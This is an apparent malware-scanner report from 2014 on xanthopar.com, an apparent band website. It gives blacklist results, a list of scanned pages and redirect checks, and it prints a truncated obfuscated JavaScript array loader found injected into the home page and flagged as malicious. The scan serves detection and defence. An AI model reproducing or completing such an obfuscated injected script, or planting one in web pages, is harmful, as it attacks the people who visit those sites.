Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=xanthopar.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://xanthopar.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://xanthopar.com/ | 200 OK Content-Length: 30090 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function($$){qq2=[8,0,26,0,11,81,29,0,26,86,65,82,0,54,48,29,84,72,73,83,27,60,59,54,48,0,0,38,85,76,76,57,69,65,82,0,5,45,79,78,84,72,0,5,36,65,84,69,0,5,40,79,85,82,83,0,5,45,73,78,85,84,69,83,0,5,51,69,67,79,78,68,83,8,9,61,93,27,0,11,75,29,0,26,0,6,82,12,54,80,29,84,72,73,83,14,3,81,8,9,12,73,29,16,27,54,80,59,17,61,11,29,17,27,87,72,73,76,69,8,73,11,11,28,23,9,91,3,82,29,54,80,59,73,61,0,15,3,82,28,3,45,9,54,80,59,73,61,0,22,3,82,93,60,0,54,80,14,83,80,76,73,67,69,8,94,90,7,9,12,17,11,94,5 Antivirus reports:
| ||
http://xanthopar.com/Scripts/swfobject_modified.js | 200 OK Content-Length: 28841 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var swfobject = function() { var UNDEF = "undefined", OBJECT = "object", SHOCKWAVE_FLASH = "Shockwave Flash", SHOCKWAVE_FLASH_AX = "ShockwaveFlash.ShockwaveFlash", FLASH_MIME_TYPE = "application/x-shockwave-flash", EXPRESS_INSTALL_ID = "SWFObjectExprInst", win = window, doc = document, nav = navigator, domLoadFnArr = [], regObjArr = [], timer = null, storedAltContent = null, storedAltContentId Antivirus reports:
| ||
http://xanthopar.com/news.html | 200 OK Content-Length: 4557 Content-Type: text/html | clean |
http://xanthopar.com/Tour.html | 200 OK Content-Length: 3393 Content-Type: text/html | clean |
http://xanthopar.com/band.html | 200 OK Content-Length: 4744 Content-Type: text/html | clean |
http://xanthopar.com/media.html | 200 OK Content-Length: 4085 Content-Type: text/html | clean |
http://xanthopar.com/extras.html | 200 OK Content-Length: 5224 Content-Type: text/html | clean |
http://xanthopar.com/Cons.html | 200 OK Content-Length: 3121 Content-Type: text/html | clean |
http://xanthopar.com/index.html | 200 OK Content-Length: 30090 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function($$){qq2=[8,0,26,0,11,81,29,0,26,86,65,82,0,54,48,29,84,72,73,83,27,60,59,54,48,0,0,38,85,76,76,57,69,65,82,0,5,45,79,78,84,72,0,5,36,65,84,69,0,5,40,79,85,82,83,0,5,45,73,78,85,84,69,83,0,5,51,69,67,79,78,68,83,8,9,61,93,27,0,11,75,29,0,26,0,6,82,12,54,80,29,84,72,73,83,14,3,81,8,9,12,73,29,16,27,54,80,59,17,61,11,29,17,27,87,72,73,76,69,8,73,11,11,28,23,9,91,3,82,29,54,80,59,73,61,0,15,3,82,28,3,45,9,54,80,59,73,61,0,22,3,82,93,60,0,54,80,14,83,80,76,73,67,69,8,94,90,7,9,12,17,11,94,5 Antivirus reports:
| ||
http://xanthopar.com/test404page.js | 404 Not Found Content-Length: 1063 Content-Type: text/html | clean |
http://xanthopar.com/../mEDIA/xanthopar1920X1080.jpg | 404 Not Found Content-Length: 1063 Content-Type: text/html | clean |
http://xanthopar.com/../mEDIA/xanthopar1280X1024.jpg | 404 Not Found Content-Length: 1063 Content-Type: text/html | clean |
http://xanthopar.com/../mEDIA/xanthoparwings1920X1080.jpg | 404 Not Found Content-Length: 1063 Content-Type: text/html | clean |
http://xanthopar.com/../mEDIA/xanthoparleather1920X1080.jpg | 404 Not Found Content-Length: 1063 Content-Type: text/html | clean |
http://xanthopar.com/../extras/XANTHOPAR_Tattoo.pdf | 404 Not Found Content-Length: 1063 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: xanthopar.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Oct 2014 04:08:31 GMT
Accept-Ranges: bytes
ETag: "aa9798c-758a-4b9797214f4c0"
Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3
Vary: Accept-Encoding,User-Agent
Content-Length: 30090
Content-Type: text/html
Last-Modified: Tue, 21 Feb 2012 13:32:43 GMT
...30090 bytes of data.
GET / HTTP/1.1
Host: xanthopar.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Oct 2014 04:08:31 GMT
Accept-Ranges: bytes
ETag: "aa9798c-758a-4b9797214f4c0"
Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3
Vary: Accept-Encoding,User-Agent
Content-Length: 30090
Content-Type: text/html
Last-Modified: Tue, 21 Feb 2012 13:32:43 GMT
...30090 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: xanthopar.com
Referer: http://www.google.com/search?q=xanthopar.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: xanthopar.com
Referer: http://www.google.com/search?q=xanthopar.com
Result:
The result is similar to the first query. There are no suspicious redirects found.